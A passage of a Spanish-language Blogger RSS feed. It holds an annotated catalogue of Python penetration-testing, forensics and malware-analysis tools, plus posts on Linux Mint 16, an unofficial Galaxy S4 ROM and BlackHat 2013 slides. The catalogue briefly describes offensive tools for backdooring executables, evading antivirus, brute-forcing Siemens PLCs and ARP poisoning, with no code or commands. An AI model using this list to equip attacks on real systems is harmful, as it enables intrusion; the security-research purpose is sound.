Google Search Grampus: herramienta multiplataforma de extracción de metadatos y footprinting, algo así como una FOCA en python y de código abierto. LibForensics: librería para desarrollar aplicaciones forenses digitales&amp;nbsp;sqlparse.py: parser para recuperar datos borrados de bases de datos SQLite TrIDLib: identifica los tipos de archivo de sus firmas binarias. Ahora incluye Python bindingVolatility: extrae y analiza artefactos digitales de la memoria volátil (RAM)&amp;nbsp; Análisis de malware: Exefilter: filtra formatos de archivo en mensajes de correo electrónico, páginas web o archivos. Detecta muchos formatos de archivo comunes y puede eliminar contenido.OS X Auditor: herramienta gratuita de análisis forense para Mac OS X. phoneyc: implementacion de honeyclient totalmente escrito en python pyew: editor hexadecimal y desensamblador en línea de comandos, principalmente usado para analizar malwarepyClamAV:&amp;nbsp; añade capacidades de detección de virus para tu software PythonpyMal: framework para análisis de malware basada en Pefile, Pydbg y Volatility.&amp;nbsp; jsunpack-n: unpacker de JavaScript genérico: emula la funcionalidad del navegador para detectar exploits dirigidos a explotar vulnerabilidades en navegadores y pluginsyara-python: identifica y clasifica muestras de malware PDF: Didier Stevens' PDF tools: analiza, identifica y crea ficheros PDF (incluye PDFiD, pdf-parser, make-pdf y mPDF)Opaf: Open Framework Analysis PDF . Convierte PDF a un árbol XML que puede ser analizado y modificado.Origapy: wrapper de Python para el módulo de Ruby Origami que desinfecta archivos PDFPDFMiner: extrae texto de ficheros PDF&amp;nbsp; pyPDF: Python PDF toolkit: extrae info, corta, une, cifra, descifra...python-poppler-qt4: une Python con la librería Poppler PDF, incluyendo soporte Qt4 Miscelaneas: Exomind: para la creación de gráficos y el desarrollo de módulos de inteligencia de código abierto, centrada en servicios de redes sociales, motores de búsqueda y mensajería instantáneaHachoir: permite ver y editar un stream binario campo por campo InlineEgg: toolbox de clases para escribir pequeños programas en PythonPyMangle: herramienta de línea de comandos y una biblioteca de Python utilizada para crear listas de palabras para su uso con otras herramientas de pruebas de intrusión RevHosts: enumera los virtual hosts de una dirección IP dadasimplejson: JSON encoder/decoder, para por ej. usar Google's AJAX API Otras herramientas y librerías útiles: Beautiful Soup: HTML parser optimizado para screen-scraping IPython: shell Python interactivo y mejorado con algunas características para la introspección de objetos, acceso a una consola del sistema y su propio sistema especial de comandos&amp;nbsp;lxml: librería más rica en características y fácil de usar para trabajar con XML y HTMLM2Crypto: wrapper OpenSSL más completomatplotlib: construye gráficos 2D de matricesMayavi: 3D de visualización de datos científicos y plottingNetworkX: librería gráfica (bordes, nodos)Pandas: librería que proporciona mayor rendimiento y mayor facilidad de uso para analizar estructuras de datos de alto rendimiento y herramientas de análisis de datosPexpect: controla y automatiza otros programas, similar al sistema Don Libes `ExpectPyQt y PySide: Python bindings para el framework Qt y librería GUI pyparsing: módulo de parsing generalRTGraph3D: crea gráficos dinámicos en 3DSikuli, tecnología visual para buscar y automatizar interfaces gráficas de usuario con capturas de pantalla. Programable en Jython Suds:&amp;nbsp; cliente SOAP ligero para servicios Web Twisted: motor de creación de redes basada en eventosWhoosh: rápido, con muchas características de indexación de texto completo y búsqueda de librería implementado en Python Source: Hackplayers</itunes:subtitle><itunes:author>noreply@blogger.com (Kodeinfect)</itunes:author><itunes:summary>Si estás involucrado en la investigación de vulnerabilidades, ingeniería inversa o pruebas de intrusión, seguro que ya habrás utilizado Python porque cuenta con un rico conjunto de librerías y herramientas útiles para estos menesteres. En la página de Dirk Loss podemos encontrar un gran recopilatorio de herramientas escritas en Python para penetration testers, algunas de ellas sólo enlaces a librerías C existentes, es decir, herramientas que hacen las librerías fácilmente utilizables desde programas de Python. Sin embargo, por la difusa situación jurídica en Alemania no se incluyen algunas de las herramientas más agresivas (frameworks PenTest, smashers bluetooth, escáneres de vulnerabilidades de aplicaciones Web, war-dialers, etc.). Por ello y para tener una lista aún más completa, vamos a ir añadiendo todas las herramientas que vayamos encontrando. No dudes en comentar esta entrada si conoces alguna más y quieres que la añadamos a esta lista: &amp;nbsp; Red: Dirtbags py-pcap: lee ficheros pcap sin libpcapdpkt: rápida y simple creación de paquetes y análisis, con las definiciones básicas de los protocolos TCP/IP&amp;nbsp; flowgrep: grep a través de payloads de paquetes utilizando expresiones regularesglastopf: honeypot que se basa en un pequeño servidor web que emula cientos de vulnerabilidades. Impacket: modifica y decodifica paquetes de red. Incluye soporte para los protocolos de más alto nivel, tales como NMB y SMB Knock Subdomain Scan:&amp;nbsp; enumera los subdominios de un dominio de destino a través de una lista de palabrasLANs.py: herramienta capaz de falsificar y envenenar la tabla de ARP de un objetivo individual. Es multihilo y asíncrono. libdnet: rutinas de red de bajo nivel, incluyendo la interfaz de búsqueda y transmisión de tramas Ethernet Mallory: proxy man-in-the-middle extensible TCP/UDP, soporta la modificación de protocolos no estandar al vuelopypcap, Pcapy y pylibpcap: varios enlaces Python para libpcap Pytbull: framework de pruebas de IDS/IPS muy flexible (incluye más de 300 tests)pynids: wrapper de libnids que incluye sniffing, IP defragmentation, reensamblado de streams TCP y detección de escaneos de puertosScapy: envia, rastrea y analiza y crea paquetes de red. Se puede usar de forma interactiva o como una librería Depuración e ingeniería inversa: Androguard: ingeniería inversa y análisis de aplicaciones de Androidapk-jet: un wrap de apktool en python para automatizar y hacer más fácil la ingeniería inversa de apks&amp;nbsp;AsmJit: sencillo wrapper en Python para AsmJit usando SWIG. AsmJit posee clases de generación de código de alto nivel que pueden utilizarse para crear código JITBeaEnginePython: bindings de BeaEngine en Python de Mario Vilas.&amp;nbsp;Binwalk: es una herramienta de análisis firmware diseñada para ayudar en el análisis, la extracción y la ingeniería inversa de imágenes del firmware y otros blobs binarios. Es fácil de utilizar, completamente programable y se puede extender fácilmente a través de firmas personalizadas, reglas de extracción y módulos de plugin.bochs-python-instrumentation: Este parche para Bochs proporciona un intérprete de Python en lugar del propio depurador Bochs, proporcionando la funcionalidad del depurador. También permite interactuar con la interfaz de instrumentación bajo demanda, al asociar dinámicamente métodos de Python para manejar eventos de instrumentación.Buggery: wrapper python para DbgEng.&amp;nbsp;ctypes: módulo de Python que permite crear y manipular tipos de datos de C en Python. Estos luego pueden pasar a funciones C cargadas desde librerías de vínculos dinámicos.Cuckoo: sistema sandbox de análisis de malware automatizado. Tiene un API para personalizar tanto el procesamiento como las etapas de presentación de informes.&amp;nbsp;Darm: Un ligero y eficiente desensamblador escrito en C para el conjunto de instrucciones ARMv7Deviare: es una API para hooks diseñada para crear productos de usuario finalDiabind: Python binding de DIA (Debug Interface Access) SDKDislib: Librería python para leer ficheros PE+ diStorm:&amp;nbsp; biblioteca de desensamblador para AMD64, bajo licencia BSDIDAPython: plugin de IDA Pro que integra Python, permitiendo ejecutar scripts en IDA ProImmunity Debugger: GUI programable y debugger en linea de comandosPaimei: framework de ingeniería inversa, incluye PyDBG, PIDA, pGRAPHpefile: permite leer y trabajar con archivos Portable Executable (PE)&amp;nbsp;pydasm: interfaz en Python para la librería libdasm de desensamblado x86PyDbgEng: wrapper en Python para el motor de depuración de Microsoft Windows&amp;nbsp;PyEMU: emulador IA-32 completamente programable, útil para análisis de malwarepython-ptrace:depurador usando ptrace (Linux, BSD y Darwin system call para trazar procesos) escrito en Pythonmona.py: PyCommand para Immunity Debugger que reemplaza y mejora pvefindaddruhooker: intercepta llamadas a llamadas a la API dentro de DLLs , así como las direcciones arbitrarias en el archivo ejecutable en la memoriavdb / vtrace: API de depuración de procesos multi-plataforma implementado en python, y vdb es un depurador que lo utiliza Fuzzing: antiparser: fuzz testing y API de inyección de fallosConstruct: librería para parsear y construir estructuras de datos (binario o texto).&amp;nbsp;&amp;nbsp; Forensic Fuzzing Tools: genera ficheros fuzzeados, sistemas de ficheros, y sistemas de ficheros con ficheros fuzzeados para probar la robustez de herramientas forenses y sistemas de análisis&amp;nbsp;Fusil: librería en Python usada para escribir programas de fuzzing&amp;nbsp;fuzzer.py (feliam): fuzzer sencillo de Felipe Andres Manzano&amp;nbsp;Fuzzbox: multi-codec media fuzzerMistress: genera formatos de archivos al vuelo y protocolos con datos malformados, basados en patrones predefinidos Peach Fuzzing Platform: framework de fuzzing extensible para la generación y la mutación basada en fuzzing (la v2 fue escrita en Python) Powerfuzzer: fuzzer web altamente automatizado y totalmente personalizable (protocolo HTTP basado en fuzzer de aplicación)SMUDGE&amp;nbsp; Sulley: framework de desarrollo fuzzer y pruebas que consiste en varios componentes extensiblesTAOF: (el Arte del Fuzzing) incluye ProxyFuzz, un fuzzer man-in -the-middle de red no deterministauntidy: fuzzer XML de propósito generalWindows IPC Fuzzing Tools: herramientas para fuzzear aplicaciones que usan mecanimos Windows Interprocess CommunicationWSBang: ejecuta pruebas automáticas contra servicios web SOAP Web: FunkLoad: medidor de carga web funcionalGhost.py: cliente webkit escrito en Python&amp;nbsp;HTTPie: cliente http similar a cURL pero más intuitivo.&amp;nbsp;mitmproxy: proxy HTTP de interceptación con soporte SSL. Permite inspeccionar y editar tráfico al vuelo.&amp;nbsp; Requests: librería HTTP sencilla y elegante, hecha para seres humanosTwill: navega por Internet mediante un interface en línea de comandos. Soporta web testing automatizadopathod / pathoc: demonio/cliente para saturar clientes y servidores HTTPProxMon: procesa logs de proxy y crea informes con los resultadospython-spidermonkey: binding para el motor JavaScript de Mozilla SpiderMonkey; permite llamar y evaluar scripts y funciones JavascriptSelenium: API para escribir pruebas funcionales usando el WebDriver Selenium para acceso a Firefox, Ie, Chrome, Remote etc.&amp;nbsp; Splinter: herramienta para testear aplicaciones web usando Python que permite automatizar acciones del navegador como visitar URLs e interactuar con sus objetos. spynner: módulo de navegación web programable para Python con soporte Javascript/AJAXWSMap: encuentra servicios web y descubre ficherosWindmill: herramienta de pruebas creada para automatizar y depurar aplicaciones webCracking: findmyhash:&amp;nbsp; script en Python para crackear hashes usando servicios online.Malware: Noriben: script que funciona en conjunción con Procmon de Sysinternals para analizar malware en sandbox. s7-brute-offline.py: herramienta que que puede realizar ataques off-line de fuerza bruta contra controladores lógicos programables (PLCs) Siemens. The Backdoor Factory: un interesante script en Python para "backdoorizar" ejecutables y librerías de Windows (Win32 PE). Tiny SHell: el clásico backdoor de código abierto en Python de Christophe DevineTinySHell bajo SCTP: un backdoor de Unix un poquito más indetectable&amp;nbsp;Veil: herramienta escrita en Python por Christopher Truncer para crear payloads de Metasploit capaces de evadir la mayoría de los antivirus.virustotal-search.py: script para automatizar desde la línea de comandos el análisis de una muestra de malware a través del conocido servicio de multiAV de Virustotal. Forense: aft: Android forensic toolkitFBStalker y GeoStalker: herramienta OSINT para Facebook y fuentes de geolocalización - Flickr, Instagram, Twitter, Wigle. Los ID de usuario encontrados son utilizados para encontrar cuentas de redes sociales a través de otras redes como Facebook, Youtube, Instagram, Google+, Linkedin y Google Search Grampus: herramienta multiplataforma de extracción de metadatos y footprinting, algo así como una FOCA en python y de código abierto. LibForensics: librería para desarrollar aplicaciones forenses digitales&amp;nbsp;sqlparse.py: parser para recuperar datos borrados de bases de datos SQLite TrIDLib: identifica los tipos de archivo de sus firmas binarias. Ahora incluye Python bindingVolatility: extrae y analiza artefactos digitales de la memoria volátil (RAM)&amp;nbsp; Análisis de malware: Exefilter: filtra formatos de archivo en mensajes de correo electrónico, páginas web o archivos. Detecta muchos formatos de archivo comunes y puede eliminar contenido.OS X Auditor: herramienta gratuita de análisis forense para Mac OS X. phoneyc: implementacion de honeyclient totalmente escrito en python pyew: editor hexadecimal y desensamblador en línea de comandos, principalmente usado para analizar malwarepyClamAV:&amp;nbsp; añade capacidades de detección de virus para tu software PythonpyMal: framework para análisis de malware basada en Pefile, Pydbg y Volatility.&amp;nbsp; jsunpack-n: unpacker de JavaScript genérico: emula la funcionalidad del navegador para detectar exploits dirigidos a explotar vulnerabilidades en navegadores y pluginsyara-python: identifica y clasifica muestras de malware PDF: Didier Stevens' PDF tools: analiza, identifica y crea ficheros PDF (incluye PDFiD, pdf-parser, make-pdf y mPDF)Opaf: Open Framework Analysis PDF . Convierte PDF a un árbol XML que puede ser analizado y modificado.Origapy: wrapper de Python para el módulo de Ruby Origami que desinfecta archivos PDFPDFMiner: extrae texto de ficheros PDF&amp;nbsp; pyPDF: Python PDF toolkit: extrae info, corta, une, cifra, descifra...python-poppler-qt4: une Python con la librería Poppler PDF, incluyendo soporte Qt4 Miscelaneas: Exomind: para la creación de gráficos y el desarrollo de módulos de inteligencia de código abierto, centrada en servicios de redes sociales, motores de búsqueda y mensajería instantáneaHachoir: permite ver y editar un stream binario campo por campo InlineEgg: toolbox de clases para escribir pequeños programas en PythonPyMangle: herramienta de línea de comandos y una biblioteca de Python utilizada para crear listas de palabras para su uso con otras herramientas de pruebas de intrusión RevHosts: enumera los virtual hosts de una dirección IP dadasimplejson: JSON encoder/decoder, para por ej. usar Google's AJAX API Otras herramientas y librerías útiles: Beautiful Soup: HTML parser optimizado para screen-scraping IPython: shell Python interactivo y mejorado con algunas características para la introspección de objetos, acceso a una consola del sistema y su propio sistema especial de comandos&amp;nbsp;lxml: librería más rica en características y fácil de usar para trabajar con XML y HTMLM2Crypto: wrapper OpenSSL más completomatplotlib: construye gráficos 2D de matricesMayavi: 3D de visualización de datos científicos y plottingNetworkX: librería gráfica (bordes, nodos)Pandas: librería que proporciona mayor rendimiento y mayor facilidad de uso para analizar estructuras de datos de alto rendimiento y herramientas de análisis de datosPexpect: controla y automatiza otros programas, similar al sistema Don Libes `ExpectPyQt y PySide: Python bindings para el framework Qt y librería GUI pyparsing: módulo de parsing generalRTGraph3D: crea gráficos dinámicos en 3DSikuli, tecnología visual para buscar y automatizar interfaces gráficas de usuario con capturas de pantalla. Programable en Jython Suds:&amp;nbsp; cliente SOAP ligero para servicios Web Twisted: motor de creación de redes basada en eventosWhoosh: rápido, con muchas características de indexación de texto completo y búsqueda de librería implementado en Python Source: Hackplayers</itunes:summary><itunes:keywords>Herramientas</itunes:keywords></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-8634323862287884579</guid><pubDate>Wed, 04 Dec 2013 13:30:00 +0000</pubDate><atom:updated>2013-12-04T09:00:30.717-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Noticias</category><title>Linux Mint 16 Disponible / Mate + Cinnamon</title><description>&lt;img alt="http://www.linuxmint.com/pictures/screenshots/petra/cinnamon.png" class="shrinkToFit" height="465" src="http://www.linuxmint.com/pictures/screenshots/petra/cinnamon.png" width="640" /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&amp;nbsp;&lt;b&gt;(Versión Cinnamon)&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;b&gt;&lt;span class="hps"&gt;Linux&lt;/span&gt; &lt;span class="hps"&gt;Mint&lt;/span&gt; &lt;span class="hps"&gt;16&lt;/span&gt;&lt;/b&gt; &lt;span class="hps"&gt;es el resultado de&lt;/span&gt; &lt;span class="hps"&gt;6 meses de&lt;/span&gt; &lt;span class="hps"&gt;desarrollo incremental&lt;/span&gt; &lt;span class="hps"&gt;en la parte superior&lt;/span&gt; &lt;span class="hps"&gt;de las tecnologías&lt;/span&gt; &lt;span class="hps"&gt;estables y confiables&lt;/span&gt;&lt;span&gt;.&lt;/span&gt; &lt;span class="hps"&gt;Esta nueva&lt;/span&gt; &lt;span class="hps"&gt;versión viene&lt;/span&gt; &lt;span class="hps"&gt;con el software&lt;/span&gt; &lt;span class="hps"&gt;actualizado&lt;/span&gt; &lt;span class="hps"&gt;y trae&lt;/span&gt; &lt;span class="hps"&gt;mejoras y&lt;/span&gt; &lt;span class="hps"&gt;nuevas características&lt;/span&gt; &lt;span class="hps"&gt;para hacer que su&lt;/span&gt; &lt;span class="hps"&gt;escritorio&lt;/span&gt; &lt;span class="hps"&gt;sea aún más cómodo&lt;/span&gt; &lt;span class="hps"&gt;de usar.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="hps"&gt;Las nuevas características&lt;/span&gt; son&lt;span class="hps"&gt;:&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_cinnamon_whatsnew.php#cinnamon"&gt;Cinnamon 2.0&lt;/a&gt;&lt;a href="http://www.linuxmint.com/rel_nadia_whatsnew.php#mate"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_cinnamon_whatsnew.php#mdm"&gt;Login Screen&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_cinnamon_whatsnew.php#mintstick"&gt;USB Stick support&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_cinnamon_whatsnew.php#performance"&gt;Performance improvements&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_cinnamon_whatsnew.php#mintinstall"&gt;Software Manager&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_cinnamon_whatsnew.php#system"&gt;System Improvements&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_cinnamon_whatsnew.php#artwork"&gt;Artwork Improvements&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_cinnamon_whatsnew.php#components"&gt;Main Components&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;a href="http://www.linuxmint.com/rel_petra_cinnamon_whatsnew.php" target="_blank"&gt;&lt;b&gt;Aquí &lt;/b&gt;&lt;/a&gt;puedes dar un vistazo a lo nuevo que trae esta versión con Cinnamon.&lt;br /&gt;&lt;b&gt;Descarga&lt;/b&gt;: &lt;a href="http://torrents.linuxmint.com/torrents/linuxmint-16-cinnamon-dvd-32bit.iso.torrent"&gt;32-bit &lt;/a&gt;&lt;a href="http://torrents.linuxmint.com/torrents/linuxmint-16-cinnamon-dvd-64bit.iso.torrent"&gt;| 64-bit&lt;/a&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;img alt="http://www.linuxmint.com/pictures/screenshots/petra/mate.png" class="shrinkToFit" height="465" src="http://www.linuxmint.com/pictures/screenshots/petra/mate.png" width="640" /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;(Versió Mate) &lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Las nuevas características son:&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_mate_whatsnew.php#mdm"&gt;Login Screen&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_mate_whatsnew.php#mintstick"&gt;USB Stick support&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_mate_whatsnew.php#performance"&gt;Performance improvements&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_mate_whatsnew.php#mintinstall"&gt;Software Manager&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_mate_whatsnew.php#system"&gt;System Improvements&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_mate_whatsnew.php#artwork"&gt;Artwork Improvements&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linuxmint.com/rel_petra_mate_whatsnew.php#components"&gt;Main Components&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;a href="http://www.linuxmint.com/rel_petra_mate_whatsnew.php" target="_blank"&gt;&lt;b&gt;Aquí &lt;/b&gt;&lt;/a&gt;puedes dar un vistazo a lo nuevo que trae esta versión con Mate. &lt;br /&gt;&lt;b&gt;Descarga&lt;/b&gt;: &lt;a href="http://torrents.linuxmint.com/torrents/linuxmint-16-mate-dvd-32bit.iso.torrent"&gt;32-bit&lt;/a&gt;&lt;a href="http://torrents.linuxmint.com/torrents/linuxmint-16-mate-dvd-64bit.iso.torrent"&gt; | 64-bit&lt;/a&gt;</description><link>http://kode-labs.blogspot.com/2013/12/linux-mint-16-disponible-mate-cinnamon.html</link><author>noreply@blogger.com (Kodeinfect)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-4171540211867108133</guid><pubDate>Wed, 04 Dec 2013 13:21:00 +0000</pubDate><atom:updated>2013-12-04T08:51:17.436-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><title>Instala Android 4.4 en tu Samsung Galaxy S4</title><description>&lt;div class="post"&gt;&lt;div class="inner" id="msg_68620"&gt;&lt;img alt="" class="bbc_img" src="http://www.androidsis.com/wp-content/uploads/2013/11/samsung-galaxy-s4-como-actualizarlo-android-4-4-kit-kat-de-manera-extraoficial-1.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;Navegando por el sensacional foro de desarrollo Android de HTC Manía me ho topado con &lt;a class="bbc_link" href="http://www.androidsis.com/actualizaciones-android-actualizar-de-manera-extraoficial-o-esperar-a-actualizaciones-oficiales-que-nunca-llegan/" target="_blank"&gt;esta sensacional Rom&lt;/a&gt; basada en Android 4.4 Kit Kat que nos permitirá actualizar nuestro  Samsung Galaxy S4 a la última versión de Android de manera extraoficial.&lt;br /&gt;&lt;br /&gt;Según  se comenta en el propio foro, esta es la mejor Rom con Android 4.4 Kit  Kat que podemos encontrar actualmente para el Samsung Galaxy S4 modelo  GT-I9505.&lt;br /&gt;&lt;br /&gt;Cómo os digo, según se comenta en el propio hilo de la  Rom, está considerada la mejor del momento, sobre todo por su gran  rendimiento y por que no tiene ningún bug conocido.&lt;br /&gt;&lt;br /&gt;En la Rom  Gummy con Android 4.4 Kit Kat podemos comprobar que funciona todo a la  perfección, Cámara, WiFi, bluetooth, datos 4G LTE, IR Blaster mdiante  una aplicación externa e incluso la reproducción de vídeo y You Tube que  en otras Roms en estado Alpha no funcionan correctamente.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;strong&gt;Requisitos para instalar la Rom&lt;/strong&gt;:&lt;br /&gt;&lt;img alt="" class="bbc_img" src="http://www.androidsis.com/wp-content/uploads/2013/11/samsung-galaxy-s4-como-actualizarlo-android-4-4-kit-kat-de-manera-extraoficial-2.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;· El primer requisito es tener un Samsung Galaxy S4 modelo GT-I9505 que deberá estar Rooteado y con la instalación del &lt;a class="bbc_link" href="http://www.htcmania.com/showthread.php?t=633414" target="_blank"&gt;Recovery modificado&lt;/a&gt;. Es imprescindible, antes de seguir con este tutorial, realizar &lt;a class="bbc_link" href="http://www.androidsis.com/como-hacer-copia-de-seguridad-de-la-carpeta-efs/" target="_blank"&gt;una copia de seguridad de la carpeta EFS&lt;/a&gt; así como un nandroid backup de todo nuestro sistema desde el Recovery.&lt;br /&gt;&lt;br /&gt;· Cómo siempre la batería deberá estar cargada al 100×100 y la depuración USB habilitada desde las opciones de desarollo del S4.&lt;br /&gt;· Una vez cumplido esto ya podemos descargarnos el &lt;a class="bbc_link" href="http://downloadandroidrom.com/file/GalaxyS4/GT-i9505/roms/Gummy/Gummy-1.1-11-21-13-UNOFFICIAL-jfltexx.zip" target="_blank"&gt;ZIP de la Rom&lt;/a&gt; y el &lt;a class="bbc_link" href="http://downloadandroidrom.com/file/gapps/4.4/gapps-kk-20131113.zip" target="_blank"&gt;ZIP de las Gapps&lt;/a&gt; y copiarlas a la memoria interna del Samsung Galaxy S4, después reiniciamos en &lt;em&gt;Recovery Mode&lt;/em&gt; y procedemos a la instalación de la Rom.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;strong&gt;Método de instalación de la Rom&lt;/strong&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img" src="http://www.androidsis.com/wp-content/uploads/2013/11/samsung-galaxy-s4-como-actualizarlo-android-4-4-kit-kat-de-manera-extraoficial-3.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;· Wipe data factory reset.&lt;br /&gt;· Wipe cache partition.&lt;br /&gt;· Advanced/wipe dalvik cache.&lt;br /&gt;· Go Back.&lt;br /&gt;· Install zip from sdcard.&lt;br /&gt;· Choose zip, seleccionamos el Zip de la Rom y confirmamos su instalación.&lt;br /&gt;· Choose zip de nuevo y seleccionamos las Gapps.&lt;br /&gt;· Reboot System now.&lt;br /&gt;&lt;br /&gt;Con eso bastaría &lt;img alt=";)" class="smiley" src="http://underc0de.org/foro/Smileys/default/wink.gif" title="Guiñar" /&gt; &amp;gt;&amp;gt; Un Saludo! | Source: &lt;a class="bbc_link" href="http://www.androidsis.com/" target="_blank"&gt;&lt;strong&gt;AndroidSis&lt;/strong&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://kode-labs.blogspot.com/2013/12/instala-android-44-en-tu-samsung-galaxy.html</link><author>noreply@blogger.com (Kodeinfect)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-8713962169457196526</guid><pubDate>Sun, 04 Aug 2013 23:43:00 +0000</pubDate><atom:updated>2013-08-04T19:13:27.103-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutoriales</category><title>Presentaciones de BlackHat USA 2013 </title><description>Ya están disponibles las &lt;a href="https://www.blackhat.com/us-13/archives.html"&gt;diapositivas&lt;/a&gt; de las presentaciones de la &lt;a href="http://www.blackhat.com/us-13/"&gt;BlackHat USA&lt;/a&gt; de esta año, celebrada en el Caesars Palace en Las Vegas entre el 27 de julio y el 1 de agosto.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;En esta edición parece que la audiencia ha estado dividida por toda  la polémica relacionada con las filtraciones de la NSA y su programa  Prism. En especial con la presentación de apertura, de la cual también  puedes acceder al vídeo, dada por el General Keith B. Alexander,  director de la agencia de seguridad nacional (NSA)&lt;/i&gt;.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Day One Keynote July 31 &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/us-13-Alexander-keynote.pdf"&gt;us-13-Alexander-keynote.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/us-13-Alexander-keynote.m4v"&gt;us-13-Alexander-keynote.m4v&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;A Practical Attack against MDM Solutions &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Brodie-A-Practical-Attack-against-MDM-Solutions-WP.pdf"&gt;US-13-Brodie-A-Practical-Attack-against-MDM-Solutions-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Brodie-A-Practical-Attack-against-MDM-Solutions-Slides.pdf"&gt;US-13-Brodie-A-Practical-Attack-against-MDM-Solutions-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Above My Pay Grade: Cyber Response at the National Level &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Healey-Above-My-Pay-Grade-WP.pdf"&gt;US-13-Healey-Above-My-Pay-Grade-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Healey-Above-My-Pay-Grade-Slides.pdf"&gt;US-13-Healey-Above-My-Pay-Grade-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Android: one root to own them all &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Forristal-Android-One-Root-to-Own-Them-All-Slides.pdf"&gt;US-13-Forristal-Android-One-Root-to-Own-Them-All-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;BinaryPig – Scalable Malware Analytics in Hadoop &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Hanif-Binarypig-Scalable-Malware-Analytics-in-Hadoop-WP.pdf"&gt;US-13-Hanif-Binarypig-Scalable-Malware-Analytics-in-Hadoop-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a 